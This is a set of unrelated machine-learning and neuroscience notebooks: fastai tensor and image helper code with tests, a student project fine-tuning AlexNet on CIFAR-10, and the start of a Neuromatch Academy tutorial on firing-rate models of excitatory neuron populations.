test_eq([b[ o] for o in range(0,5)], range(0,5))
test_eq([b[-o] for o in range(1,6)], [25,24,23,22,21])
test_eq(b[6:13], torch.arange(6,13))
test_eq(b[20:77], torch.arange(20,26))
test_eq(b[:5], torch.arange(5))
test_eq(b[:2], torch.arange(2))
docs = L(TensorBase(t[a:b]) for a,b in ((0,3),(3,7),(7,8),(8,16),(16,24),(24,26)))
b = Chunks(docs)
test_eq_type(b[:2], TensorBase(range(2)))
test_eq_type(b[:5], TensorBase(range(5)))
test_eq_type(b[9:13], TensorBase(range(9,13)))
```
## Other functions
```
#export
def apply(func, x, *args, **kwargs):
"Apply `func` recursively to `x`, passing on args"
if is_listy(x): return type(x)([apply(func, o, *args, **kwargs) for o in x])
if isinstance(x,dict): return {k: apply(func, v, *args, **kwargs) for k,v in x.items()}
res = func(x, *args, **kwargs)
return res if x is None else retain_type(res, x)
#export
def to_detach(b, cpu=True):
"Recursively detach lists of tensors in `b `; put them on the CPU if `cpu=True`."
def _inner(x, cpu=True):
if not isinstance(x,Tensor): return x
x = x.detach()
return x.cpu() if cpu else x
return apply(_inner, b, cpu=cpu)
#export
def to_half(b):
"Recursively map lists of tensors in `b ` to FP16."
return apply(lambda x: x.half() if torch.is_floating_point(x) else x, b)
#export
def to_float(b):
"Recursively map lists of int tensors in `b ` to float."
return apply(lambda x: x.float() if torch.is_floating_point(x) else x, b)
#export
# None: True if available; True: error if not availabe; False: use CPU
defaults.use_cuda = None
#export
def default_device(use_cuda=-1):
"Return or set default device; `use_cuda`: None - CUDA if available; True - error if not availabe; False - CPU"
if use_cuda != -1: defaults.use_cuda=use_cuda
use = defaults.use_cuda or (torch.cuda.is_available() and defaults.use_cuda is None)
assert torch.cuda.is_available() or not use
return torch.device(torch.cuda.current_device()) if use else torch.device('cpu')
#cuda
_td = torch.device(torch.cuda.current_device())
test_eq(default_device(None), _td)
test_eq(default_device(True), _td)
test_eq(default_device(False), torch.device('cpu'))
default_device(None);
#export
def to_device(b, device=None):
"Recursively put `b` on `device`."
if device is None: device=default_device()
def _inner(o): return o.to(device, non_blocking=True) if isinstance(o,Tensor) else o
return apply(_inner, b)
t = to_device((3,(tensor(3),tensor(2))))
t1,(t2,t3) = t
test_eq_type(t,(3,(tensor(3).cuda(),tensor(2).cuda())))
test_eq(t2.type(), "torch.cuda.LongTensor")
test_eq(t3.type(), "torch.cuda.LongTensor")
#export
def to_cpu(b):
"Recursively map lists of tensors in `b ` to the cpu."
return to_device(b,'cpu')
t3 = to_cpu(t3)
test_eq(t3.type(), "torch.LongTensor")
test_eq(t3, 2)
# #export
# def to_np(x):
# "Convert a tensor to a numpy array."
# return apply(Self.detach().cpu().numpy(), x)
#export
def to_np(x):
"Convert a tensor to a numpy array."
return apply(lambda o: o.data.cpu().numpy(), x)
t3 = to_np(t3)
test_eq(type(t3), np.ndarray)
test_eq(t3, 2)
#export
def item_find(x, idx=0):
"Recursively takes the `idx`-th element of `x`"
if is_listy(x): return item_find(x[idx])
if isinstance(x,dict):
key = list(x.keys())[idx] if isinstance(idx, int) else idx
return item_find(x[key])
return x
#export
def find_device(b):
"Recursively search the device of `b`."
return item_find(b).device
dev = default_device()
test_eq(find_device(t2), dev)
test_eq(find_device([t2,t2]), dev)
test_eq(find_device({'a':t2,'b':t2}), dev)
test_eq(find_device({'a':[[t2],[t2]],'b':t2}), dev)
#export
def find_bs(b):
"Recursively search the batch size of `b`."
return item_find(b).shape[0]
x = torch.randn(4,5)
test_eq(find_bs(x), 4)
test_eq(find_bs([x, x]), 4)
test_eq(find_bs({'a':x,'b':x}), 4)
test_eq(find_bs({'a':[[x],[x]],'b':x}), 4)
def np_func(f):
"Convert a function taking and returning numpy arrays to one taking and returning tensors"
def _inner(*args, **kwargs):
nargs = [to_np(arg) if isinstance(arg,Tensor) else arg for arg in args]
return tensor(f(*nargs, **kwargs))
functools.update_wrapper(_inner, f)
return _inner
```
This decorator is particularly useful for using numpy functions as fastai metrics, for instance:
```
from sklearn.metrics import f1_score
@np_func
def f1(inp,targ): return f1_score(targ, inp)
a1,a2 = array([0,1,1]),array([1,0,1])
t = f1(tensor(a1),tensor(a2))
test_eq(f1_score(a1,a2), t)
assert isinstance(t,Tensor)
#export
class Module(nn.Module, metaclass=PrePostInitMeta):
"Same as `nn.Module`, but no need for subclasses to call `super().__init__`"
def __pre_init__(self): super().__init__()
def __init__(self): pass
show_doc(Module, title_level=3)
class _T(Module):
def __init__(self): self.f = nn.Linear(1,1)
def forward(self,x): return self.f(x)
t = _T()
t(tensor([1.]))
# export
def one_hot(x, c):
"One-hot encode `x` with `c` classes."
res = torch.zeros(c, dtype=torch.uint8)
res[L(x)] = 1.
return res
test_eq(one_hot([1,4], 5), tensor(0,1,0,0,1).byte())
test_eq(one_hot([], 5), tensor(0,0,0,0,0).byte())
test_eq(one_hot(2, 5), tensor(0,0,1,0,0).byte())
#export
def one_hot_decode(x, vocab=None):
return L(vocab[i] if vocab else i for i,x_ in enumerate(x) if x_==1)
test_eq(one_hot_decode(tensor(0,1,0,0,1)), [1,4])
test_eq(one_hot_decode(tensor(0,0,0,0,0)), [ ])
test_eq(one_hot_decode(tensor(0,0,1,0,0)), [2 ])
#export
def trainable_params(m):
"Return all trainable parameters of `m`"
return [p for p in m.parameters() if p.requires_grad]
m = nn.Linear(4,5)
test_eq(trainable_params(m), [m.weight, m.bias])
m.weight.requires_grad_(False)
test_eq(trainable_params(m), [m.bias])
#export
def bn_bias_params(m):
"Return all bias and BatchNorm parameters"
if isinstance(m, (nn.BatchNorm1d, nn.BatchNorm2d, nn.BatchNorm3d)): return list(m.parameters())
res = sum([bn_bias_params(c) for c in m.children()], [])
if hasattr(m, 'bias'): res.append(m.bias)
return res
model = nn.Sequential(nn.Linear(10,20), nn.BatchNorm1d(20), nn.Conv1d(3,4, 3))
test_eq(bn_bias_params(model), [model[0].bias, model[1].weight, model[1].bias, model[2].bias])
model = nn.ModuleList([nn.Linear(10,20), nn.Sequential(nn.BatchNorm1d(20), nn.Conv1d(3,4, 3))])
test_eq(bn_bias_params(model), [model[0].bias, model[1][0].weight, model[1][0].bias, model[1][1].bias])
```
### Image helpers
```
#export
def make_cross_image(bw=True):
"Create a tensor containing a cross image, either `bw` (True) or color"
if bw:
im = torch.zeros(5,5)
im[2,:] = 1.
im[:,2] = 1.
else:
im = torch.zeros(3,5,5)
im[0,2,:] = 1.
im[1,:,2] = 1.
return im
plt.imshow(make_cross_image(), cmap="Greys");
plt.imshow(make_cross_image(False).permute(1,2,0));
#export
def show_title(o, ax=None, ctx=None, label=None, **kwargs):
"Set title of `ax` to `o`, or print `o` if `ax` is `None`"
ax = ifnone(ax,ctx)
if ax is None: print(o)
elif hasattr(ax, 'set_title'): ax.set_title(o)
elif isinstance(ax, pd.Series):
while label in ax: label += '_'
ax = ax.append(pd.Series({label: o}))
return ax
test_stdout(lambda: show_title("title"), "title")
# ensure that col names are unique when showing to a pandas series
assert show_title("title", ctx=pd.Series(dict(a=1)), label='a').equals(pd.Series(dict(a=1,a_='title')))
#export
def show_image(im, ax=None, figsize=None, title=None, ctx=None, **kwargs):
"Show a PIL or PyTorch image on `ax`."
ax = ifnone(ax,ctx)
if ax is None: _,ax = plt.subplots(figsize=figsize)
# Handle pytorch axis order
if isinstance(im,Tensor):
im = to_cpu(im)
if im.shape[0]<5: im=im.permute(1,2,0)
elif not isinstance(im,np.ndarray): im=array(im)
# Handle 1-channel images
if im.shape[-1]==1: im=im[...,0]
ax.imshow(im, **kwargs)
if title is not None: ax.set_title(title)
ax.axis('off')
return ax
```
`show_image` can show b&w images...
```
im = make_cross_image()
ax = show_image(im, cmap="Greys", figsize=(2,2))
```
...and color images with standard `c*h*w` dim order...
```
im2 = make_cross_image(False)
ax = show_image(im2, figsize=(2,2))
```
...and color images with `h*w*c` dim order...
```
im3 = im2.permute(1,2,0)
ax = show_image(im3, figsize=(2,2))
ax = show_image(im, cmap="Greys", figsize=(2,2))
show_title("Cross", ax)
#export
def show_titled_image(o, **kwargs):
"Call `show_image` destructuring `o` to `(img,title)`"
show_image(o[0], title=str(o[1]), **kwargs)
#export
def show_image_batch(b, show=show_titled_image, items=9, cols=3, figsize=None, **kwargs):
"Display batch `b` in a grid of size `items` with `cols` width"
rows = (items+cols-1) // cols
if figsize is None: figsize = (cols*3, rows*3)
fig,axs = plt.subplots(rows, cols, figsize=figsize)
for *o,ax in zip(*to_cpu(b), axs.flatten()): show(o, ax=ax, **kwargs)
show_image_batch(([im,im2,im3],['bw','chw','hwc']), items=3)
```
# Export -
```
#hide
from local.notebook.export import notebook2script
notebook2script(all_fs=True)
```
|
github_jupyter
|
# COMP551: Project 4
```
import pandas as pd
import torch
import torchvision
from PIL import Image
import torchvision.transforms as transforms
import numpy as np
from torch.utils.data import DataLoader, Dataset, TensorDataset
# Load the Drive helper and mount
from google.colab import drive
# This will prompt for authorization.
drive.mount('/content/drive')
transform = transforms.Compose([transforms.Resize(32,32),
transforms.ToTensor(),
#transforms.Lambda(lambda x: x.repeat(3,1,1)),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
training_dataset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform)
validation_dataset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform)
trainloader = torch.utils.data.DataLoader(training_dataset, batch_size=100, shuffle=True,num_workers=2)
validloader = torch.utils.data.DataLoader(validation_dataset, batch_size = 100, shuffle=False,num_workers=2)
#*********************************************************************
# model part
import torchvision.models as models
# use pretrained model:
model = models.alexnet(pretrained = True)
#import OrderedDicted to corectly align the network layers
print(model)
#import nn to modify features
from collections import OrderedDict
from torch import nn
# cgange features to deal with image reduction small output size issue
features = nn.Sequential(
nn.Conv2d(3, 64, kernel_size=11, stride=4, padding=2),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=3, stride=2),
nn.Conv2d(64, 192, kernel_size=5, padding=2),
nn.ReLU(inplace=True),
# nn.MaxPool2d(kernel_size=3, stride=2),
nn.Conv2d(192, 384, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(384, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=3, stride=2),
)
model.features= features
#create classifier which fit our num of outputs
classifier = nn.Sequential(
nn.Dropout(p=0.5),
nn.Linear(in_features=9216, out_features=4096, bias=True),
nn.ReLU(),
nn.Dropout(p=0.5),
nn.Linear(in_features=4096, out_features=4096, bias=True),
nn.ReLU(),
nn.Linear(in_features=4096, out_features=10, bias=True)
)
#replace the model's classifier with this new classifier
model.classifier = classifier
print(model)
#import optimizer:
from torch import optim
#define criteria and optimizer
# Note that other losses or optimizers can also be tried
criteria = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr = 0.0003, momentum=0.9)
#train model
#define training function
def train (model, loader, criterion, gpu):
model.train()
current_loss = 0
current_correct = 0
for train, y_train in iter(loader):
if gpu:
train, y_train = train.to('cuda'), y_train.to('cuda')
optimizer.zero_grad()
output = model.forward(train)
_, preds = torch.max(output,1)
loss = criterion(output, y_train)
loss.backward()
optimizer.step()
current_loss += loss.item()*train.size(0)
current_correct += torch.sum(preds == y_train.data)
#check if the training is correct: print(preds,y_train,current_correct,current_loss)
epoch_loss = current_loss / len(loader)
# devide 4 because we read 4 data everytime
epoch_acc = current_correct.double() / len(loader)/100
return epoch_loss, epoch_acc
#define validation function
def validation (model, loader, criterion, gpu):
model.eval()
valid_loss = 0
valid_correct = 0
#I added this
pred=torch.zeros(len(loader))
for valid, y_valid in iter(loader):
if gpu:
valid, y_valid = valid.to('cuda'), y_valid.to('cuda')
output = model.forward(valid)
_, preds = torch.max(output,1)
valid_loss += criterion(output, y_valid).item()*valid.size(0)
valid_correct += torch.sum(preds == y_valid.data)
epoch_loss = valid_loss / len(loader)
epoch_acc = valid_correct.double() / len(loader)/100
return epoch_loss, epoch_acc
#define test function
def test (model, loader, criterion, gpu):
model.eval()
valid_loss = 0
valid_correct = 0
i=0
pred=torch.zeros(len(loader))
for test, y_train in iter(loader):
if gpu:
test = test.to('cuda')
output = model.forward(test)
_, preds = torch.max(output,1)
pred[i]=preds
i=i+1
return pred
# training
#send model to gpu. If not send it to GPU, delete next line.
model.to('cuda')
train_losses =[]
train_acc =[]
valid_losses=[]
valid_acc =[]
#Initialize training params
#freeze gradient parameters in pretrained model
for param in model.parameters():
param.require_grad = False
# define number of epochs
epochs = 16
epoch = 0
for e in range(epochs):
epoch +=1
print(epoch)
#train:
with torch.set_grad_enabled(True):
epoch_train_loss, epoch_train_acc = train(model,trainloader, criteria, 1)
train_losses.append(epoch_train_loss)
train_acc.append(epoch_train_acc)
print("Epoch: {} Train Loss : {:.4f} Train Accuracy: {:.4f}".format(epoch,epoch_train_loss,epoch_train_acc))
#Valid, Activate next code when validation result is needed:
with torch.no_grad():
epoch_val_loss, epoch_val_acc = validation(model, validloader, criteria, 1)
valid_losses.append(epoch_val_loss)
valid_acc.append(epoch_val_acc)
print("Epoch: {} Validation Loss : {:.4f} Validation Accuracy {:.4f}".format(epoch,epoch_val_loss,epoch_val_acc))
#Plot training and validation losses
import matplotlib.pyplot as plt
import numpy as np
plt.plot(train_losses, label='Training loss')
plt.plot(valid_losses, label='Validation loss')
plt.legend()
#Plot training and validation accuracy
plt.plot(train_acc, label='Training accuracy')
plt.plot(valid_acc, label='Validation accuracy')
plt.legend()
# for variety, lets use altair to do the plot
import altair as alt
# create a pandas dataframe for the loss
df = pd.DataFrame({
'epoch': range(1, len(train_losses) + 1),
'train': train_losses,
'valid': valid_losses
})
# unpivot to have cols [epoch, dataset, loss]
df = df.melt(id_vars=['epoch'],
value_vars=['train', 'valid'],
value_name='loss',
var_name='Dataset')
# line plot with altair
alt.Chart(df).mark_line(point=True)\
.encode(x='epoch', y='loss', color='Dataset')\
.interactive()
```
|
github_jupyter
|
<a href="https://colab.research.google.com/github/NeuromatchAcademy/course-content/blob/master/tutorials/W2D4_DynamicNetworks/W2D4_Tutorial1.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Tutorial 1: Neural Rate Models
**Week 2, Day 4: Dynamic Networks**
**By Neuromatch Academy**
__Content creators:__ Qinglong Gu, Songtin Li, Arvind Kumar, John Murray, Julijana Gjorgjieva
__Content reviewers:__ Maryam Vaziri-Pashkam, Ella Batty, Lorenzo Fontolan, Richard Gao, Spiros Chavlis, Michael Waskom
---
# Tutorial Objectives
The brain is a complex system, not because it is composed of a large number of diverse types of neurons, but mainly because of how neurons are connected to each other. The brain is indeed a network of highly specialized neuronal networks.
The activity of a neural network constantly evolves in time. For this reason, neurons can be modeled as dynamical systems. The dynamical system approach is only one of the many modeling approaches that computational neuroscientists have developed (other points of view include information processing, statistical models, etc.).
How the dynamics of neuronal networks affect the representation and processing of information in the brain is an open question. However, signatures of altered brain dynamics present in many brain diseases (e.g., in epilepsy or Parkinson's disease) tell us that it is crucial to study network activity dynamics if we want to understand the brain.
In this tutorial, we will simulate and study one of the simplest models of biological neuronal networks. Instead of modeling and simulating individual excitatory neurons (e.g., LIF models that you implemented yesterday), we will treat them as a single homogeneous population and approximate their dynamics using a single one-dimensional equation describing the evolution of their average spiking rate in time.
In this tutorial, we will learn how to build a firing rate model of a single population of excitatory neurons.
**Steps:**
- Write the equation for the firing rate dynamics of a 1D excitatory population.
- Visualize the response of the population as a function of parameters such as threshold level and gain, using the frequency-current (F-I) curve.
- Numerically simulate the dynamics of the excitatory population and find the fixed points of the system.
- Investigate the stability of the fixed points by linearizing the dynamics around them.
---
# Setup
```
# Imports
import matplotlib.pyplot as plt
import numpy as np
import scipy.optimize as opt # root-finding algorithm
# @title Figure Settings
import ipywidgets as widgets # interactive display
%config InlineBackend.figure_format = 'retina'
plt.style.use("https://raw.githubusercontent.com/NeuromatchAcademy/course-content/master/nma.mplstyle")
# @title Helper functions
def plot_fI(x, f):
plt.figure(figsize=(6, 4)) # plot the figure
plt.plot(x, f, 'k')
plt.xlabel('x (a.u.)', fontsize=14)
plt.ylabel('F(x)', fontsize=14)
plt.show()
def plot_dr_r(r, drdt, x_fps=None):
plt.figure()
plt.plot(r, drdt, 'k')
plt.plot(r, 0. * r, 'k--')
if x_fps is not None:
plt.plot(x_fps, np.zeros_like(x_fps), "ko", ms=12)
plt.xlabel(r'$r$')
plt.ylabel(r'$\frac{dr}{dt}$', fontsize=20)
plt.ylim(-0.1, 0.1)
def plot_dFdt(x, dFdt):
plt.figure()
plt.plot(x, dFdt, 'r')
plt.xlabel('x (a.u.)', fontsize=14)
plt.ylabel('dF(x)', fontsize=14)
plt.show()
```
---
# Section 1: Neuronal network dynamics
```
# @title Video 1: Dynamic networks
from IPython.display import YouTubeVideo
video = YouTubeVideo(id="p848349hPyw", width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
```
## Section 1.1: Dynamics of a single excitatory population
Individual neurons respond by spiking. When we average the spikes of neurons in a population, we can define the average firing activity of the population. In this model, we are interested in how the population-averaged firing varies as a function of time and network parameters. Mathematically, we can describe the firing rate dynamic as:
\begin{align}
\tau \frac{dr}{dt} &= -r + F(w\cdot r + I_{\text{ext}}) \quad\qquad (1)
\end{align}
$r(t)$ represents the average firing rate of the excitatory population at time $t$, $\tau$ controls the timescale of the evolution of the average firing rate, $w$ denotes the strength (synaptic weight) of the recurrent input to the population, $I_{\text{ext}}$ represents the external input, and the transfer function $F(\cdot)$ (which can be related to f-I curve of individual neurons described in the next sections) represents the population activation function in response to all received inputs.
To start building the model, please execute the cell below to initialize the simulation parameters.
```
# @markdown *Execute this cell to set default parameters for a single excitatory population model*
def default_pars_single(**kwargs):
pars = {}
# Excitatory parameters
pars['tau'] = 1. # Timescale of the E population [ms]
pars['a'] = 1.2 # Gain of the E population
pars['theta'] = 2.8 # Threshold of the E population
# Connection strength
pars['w'] = 0. # E to E, we first set it to 0
# External input
pars['I_ext'] = 0.
# simulation parameters
pars['T'] = 20. # Total duration of simulation [ms]
pars['dt'] = .1 # Simulation time step [ms]
pars['r_init'] = 0.2 # Initial value of E
# External parameters if any
pars.update(kwargs)
# Vector of discretized time points [ms]
pars['range_t'] = np.arange(0, pars['T'], pars['dt'])
return pars
```
You can now use:
- `pars = default_pars_single()` to get all the parameters, and then you can execute `print(pars)` to check these parameters.
- `pars = default_pars_single(T=T_sim, dt=time_step)` to set new simulation time and time step
- To update an existing parameter dictionary, use `pars['New_para'] = value`
Because `pars` is a dictionary, it can be passed to a function that requires individual parameters as arguments using `my_func(**pars)` syntax.
## Section 1.2: F-I curves
In electrophysiology, a neuron is often characterized by its spike rate output in response to input currents. This is often called the **F-I** curve, denoting the output spike frequency (**F**) in response to different injected currents (**I**). We estimated this for an LIF neuron in yesterday's tutorial.
The transfer function $F(\cdot)$ in Equation $1$ represents the gain of the population as a function of the total input. The gain is often modeled as a sigmoidal function, i.e., more input drive leads to a nonlinear increase in the population firing rate. The output firing rate will eventually saturate for high input values.
A sigmoidal $F(\cdot)$ is parameterized by its gain $a$ and threshold $\theta$.
$$ F(x;a,\theta) = \frac{1}{1+\text{e}^{-a(x-\theta)}} - \frac{1}{1+\text{e}^{a\theta}} \quad(2)$$
The argument $x$ represents the input to the population. Note that the second term is chosen so that $F(0;a,\theta)=0$.
Many other transfer functions (generally monotonic) can be also used. Examples are the rectified linear function $ReLU(x)$ or the hyperbolic tangent $tanh(x)$.
### Exercise 1: Implement F-I curve
Let's first investigate the activation functions before simulating the dynamics of the entire population.
In this exercise, you will implement a sigmoidal **F-I** curve or transfer function $F(x)$, with gain $a$ and threshold level $\theta$ as parameters.
```
def F(x, a, theta):
"""
Population activation function.
Args:
x (float): the population input
a (float): the gain of the function
theta (float): the threshold of the function
Returns:
float: the population activation response F(x) for input x
"""
#################################################
## TODO for students: compute f = F(x) ##
# Fill out function and remove
raise NotImplementedError("Student excercise: implement the f-I function")
#################################################
# Define the sigmoidal transfer function f = F(x)
f = ...
return f
pars = default_pars_single() # get default parameters
x = np.arange(0, 10, .1) # set the range of input
# Uncomment below to test your function
# f = F(x, pars['a'], pars['theta'])
# plot_fI(x, f)
# to_remove solution
def F(x, a, theta):
"""
Population activation function.
Args:
x (float): the population input
a (float): the gain of the function
theta (float): the threshold of the function
Returns:
float: the population activation response F(x) for input x
"""
# Define the sigmoidal transfer function f = F(x)
f = (1 + np.exp(-a * (x - theta)))**-1 - (1 + np.exp(a * theta))**-1
return f
pars = default_pars_single() # get default parameters
x = np.arange(0, 10, .1) # set the range of input
# Uncomment below to test your function
f = F(x, pars['a'], pars['theta'])
with plt.xkcd():
plot_fI(x, f)
```
### Interactive Demo: Parameter exploration of F-I curve
Here's an interactive demo that shows how the F-I curve changes for different values of the gain and threshold parameters. How do the gain and threshold parameters affect the F-I curve?
```
# @title
# @markdown Make sure you execute this cell to enable the widget!
def interactive_plot_FI(a, theta):
"""
Population activation function.
Expecxts:
a : the gain of the function
theta : the threshold of the function
Returns:
plot the F-I curve with give parameters
"""
# set the range of input
x = np.arange(0, 10, .1)
plt.figure()
plt.plot(x, F(x, a, theta), 'k')
plt.xlabel('x (a.u.)', fontsize=14)
plt.ylabel('F(x)', fontsize=14)
plt.show()
_ = widgets.interact(interactive_plot_FI, a=(0.3, 3, 0.3), theta=(2, 4, 0.2))
# to_remove explanation
"""
Discussion:
For the function we have chosen to model the F-I curve (eq 2),
- a determines the slope (gain) of the rising phase of the F-I curve
- theta determines the input at which the function F(x) reaches its mid-value (0.5).
That is, theta shifts the F-I curve along the horizontal axis.
For our neurons we are using in this tutorial:
- a controls the gain of the neuron population
- theta controls the threshold at which the neuron population starts to respond
""";
```
## Section 1.3: Simulation scheme of E dynamics
Because $F(\cdot)$ is a nonlinear function, the exact solution of Equation $1$ can not be determined via analytical methods. Therefore, numerical methods must be used to find the solution. In practice, the derivative on the left-hand side of Equation $1$ can be approximated using the Euler method on a time-grid of stepsize $\Delta t$:
\begin{align}
&\frac{dr}{dt} \approx \frac{r[k+1]-r[k]}{\Delta t}
\end{align}
where $r[k] = r(k\Delta t)$.
Thus,
$$\Delta r[k] = \frac{\Delta t}{\tau}[-r[k] + F(w\cdot r[k] + I_{\text{ext}}[k];a,\theta)]$$
Hence, Equation (1) is updated at each time step by:
$$r[k+1] = r[k] + \Delta r[k]$$
```
# @markdown *Execute this cell to enable the single population rate model simulator: `simulate_single`*
def simulate_single(pars):
"""
Simulate an excitatory population of neurons
Args:
pars : Parameter dictionary
Returns:
rE : Activity of excitatory population (array)
Example:
pars = default_pars_single()
r = simulate_single(pars)
"""
# Set parameters
tau, a, theta = pars['tau'], pars['a'], pars['theta']
w = pars['w']
I_ext = pars['I_ext']
r_init = pars['r_init']
dt, range_t = pars['dt'], pars['range_t']
Lt = range_t.size
# Initialize activity
r = np.zeros(Lt)
r[0] = r_init
I_ext = I_ext * np.ones(Lt)
# Update the E activity
for k in range(Lt - 1):
dr = dt / tau * (-r[k] + F(w * r[k] + I_ext[k], a, theta))
r[k+1] = r[k] + dr
return r
help(simulate_single)
```
### Interactive Demo: Parameter Exploration of single population dynamics
Note that $w=0$, as in the default setting, means no recurrent input to the neuron population in Equation (1). Hence, the dynamics are entirely determined by the external input $I_{\text{ext}}$. Explore these dynamics in this interactive demo.
How does $r_{\text{sim}}(t)$ change with different $I_{\text{ext}}$ values? How does it change with different $\tau$ values? Investigate the relationship between $F(I_{\text{ext}}; a, \theta)$ and the steady value of $r(t)$.
Note that, $r_{\rm ana}(t)$ denotes the analytical solution - you will learn how this is computed in the next section.
```
# @title
# @markdown Make sure you execute this cell to enable the widget!
# get default parameters
pars = default_pars_single(T=20.)
def Myplot_E_diffI_difftau(I_ext, tau):
# set external input and time constant
pars['I_ext'] = I_ext
pars['tau'] = tau
# simulation
r = simulate_single(pars)
# Analytical Solution
r_ana = (pars['r_init']
+ (F(I_ext, pars['a'], pars['theta'])
- pars['r_init']) * (1. - np.exp(-pars['range_t'] / pars['tau'])))
# plot
plt.figure()
plt.plot(pars['range_t'], r, 'b', label=r'$r_{\mathrm{sim}}$(t)', alpha=0.5,
zorder=1)
plt.plot(pars['range_t'], r_ana, 'b--', lw=5, dashes=(2, 2),
label=r'$r_{\mathrm{ana}}$(t)', zorder=2)
plt.plot(pars['range_t'],
F(I_ext, pars['a'], pars['theta']) * np.ones(pars['range_t'].size),
'k--', label=r'$F(I_{\mathrm{ext}})$')
plt.xlabel('t (ms)', fontsize=16.)
plt.ylabel('Activity r(t)', fontsize=16.)
plt.legend(loc='best', fontsize=14.)
plt.show()
_ = widgets.interact(Myplot_E_diffI_difftau, I_ext=(0.0, 10., 1.),
tau=(1., 5., 0.2))
# to_remove explanation
"""
Discussion:
Given the choice of F-I curve (eq 2) and dynamics of the neuron population (eq. 1)
the neurons have two fixed points or steady-state responses irrespective of the input.
- Weak inputs to the neurons eventually result in the activity converging to zero
- Strong inputs to the neurons eventually result in the activity converging to max value
The time constant tau, does not affect the steady-state response but it determines
the time the neurons take to reach to their fixed point.
""";
```
## Think!
Above, we have numerically solved a system driven by a positive input. Yet, $r_E(t)$ either decays to zero or reaches a fixed non-zero value.
- Why doesn't the solution of the system "explode" in a finite time? In other words, what guarantees that $r_E$(t) stays finite?
- Which parameter would you change in order to increase the maximum value of the response?
```
# to_remove explanation
"""
Discussion:
1) As the F-I curve is bounded between zero and one, the system doesn't explode.
The f-curve guarantees this property
2) One way to increase the maximum response is to change the f-I curve. For
example, the ReLU is an unbounded function, and thus will increase the overall maximal
response of the network.
""";
```
---
# Section 2: Fixed points of the single population system
```
# @title Video 2: Fixed point
from IPython.display import YouTubeVideo
video = YouTubeVideo(id="Ox3ELd1UFyo", width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
```
As you varied the two parameters in the last Interactive Demo, you noticed that, while at first the system output quickly changes, with time, it reaches its maximum/minimum value and does not change anymore. The value eventually reached by the system is called the **steady state** of the system, or the **fixed point**. Essentially, in the steady states the derivative with respect to time of the activity ($r$) is zero, i.e. $\displaystyle \frac{dr}{dt}=0$.
We can find that the steady state of the Equation. (1) by setting $\displaystyle{\frac{dr}{dt}=0}$ and solve for $r$:
$$-r_{\text{steady}} + F(w\cdot r_{\text{steady}} + I_{\text{ext}};a,\theta) = 0, \qquad (3)$$
When it exists, the solution of Equation. (3) defines a **fixed point** of the dynamical system in Equation (1). Note that if $F(x)$ is nonlinear, it is not always possible to find an analytical solution, but the solution can be found via numerical simulations, as we will do later.
From the Interactive Demo, one could also notice that the value of $\tau$ influences how quickly the activity will converge to the steady state from its initial value.
In the specific case of $w=0$, we can also analytically compute the solution of Equation (1) (i.e., the thick blue dashed line) and deduce the role of $\tau$ in determining the convergence to the fixed point:
$$\displaystyle{r(t) = \big{[}F(I_{\text{ext}};a,\theta) -r(t=0)\big{]} (1-\text{e}^{-\frac{t}{\tau}})} + r(t=0)$$ \\
We can now numerically calculate the fixed point with a root finding algorithm.
## Exercise 2: Visualization of the fixed points
When it is not possible to find the solution for Equation (3) analytically, a graphical approach can be taken. To that end, it is useful to plot $\displaystyle{\frac{dr}{dt}}$ as a function of $r$. The values of $r$ for which the plotted function crosses zero on the y axis correspond to fixed points.
Here, let us, for example, set $w=5.0$ and $I^{\text{ext}}=0.5$. From Equation (1), you can obtain
$$\frac{dr}{dt} = [-r + F(w\cdot r + I^{\text{ext}})]\,/\,\tau $$
Then, plot the $dr/dt$ as a function of $r$, and check for the presence of fixed points.
```
def compute_drdt(r, I_ext, w, a, theta, tau, **other_pars):
"""Given parameters, compute dr/dt as a function of r.
Args:
r (1D array) : Average firing rate of the excitatory population
I_ext, w, a, theta, tau (numbers): Simulation parameters to use
other_pars : Other simulation parameters are unused by this function
Returns
drdt function for each value of r
"""
#########################################################################
# TODO compute drdt and disable the error
raise NotImplementedError("Finish the compute_drdt function")
#########################################################################
# Calculate drdt
drdt = ...
return drdt
# Define a vector of r values and the simulation parameters
r = np.linspace(0, 1, 1000)
pars = default_pars_single(I_ext=0.5, w=5)
# Uncomment to test your function
# drdt = compute_drdt(r, **pars)
# plot_dr_r(r, drdt)
# to_remove solution
def compute_drdt(r, I_ext, w, a, theta, tau, **other_pars):
"""Given parameters, compute dr/dt as a function of r.
Args:
r (1D array) : Average firing rate of the excitatory population
I_ext, w, a, theta, tau (numbers): Simulation parameters to use
other_pars : Other simulation parameters are unused by this function
Returns
drdt function for each value of r
"""
# Calculate drdt
drdt = (-r + F(w * r + I_ext, a, theta)) / tau
return drdt
# Define a vector of r values and the simulation parameters
r = np.linspace(0, 1, 1000)
pars = default_pars_single(I_ext=0.5, w=5)
drdt = compute_drdt(r, **pars)
with plt.xkcd():
plot_dr_r(r, drdt)
```
## Exercise 3: Fixed point calculation
We will now find the fixed points numerically. To do so, we need to specif initial values ($r_{\text{guess}}$) for the root-finding algorithm to start from. From the line $\displaystyle{\frac{dr}{dt}}$ plotted above in Exercise 2, initial values can be chosen as a set of values close to where the line crosses zero on the y axis (real fixed point).
The next cell defines three helper functions that we will use:
- `my_fp_single(r_guess, **pars)` uses a root-finding algorithm to locate a fixed point near a given initial value
- `check_fp_single(x_fp, **pars)`, verifies that the values of $r_{\rm fp}$ for which $\displaystyle{\frac{dr}{dt}} = 0$ are the true fixed points
- `my_fp_finder(r_guess_vector, **pars)` accepts an array of initial values and finds the same number of fixed points, using the above two functions
```
# @markdown *Execute this cell to enable the fixed point functions*
def my_fp_single(r_guess, a, theta, w, I_ext, **other_pars):
"""
Calculate the fixed point through drE/dt=0
Args:
r_guess : Initial value used for scipy.optimize function
a, theta, w, I_ext : simulation parameters
Returns:
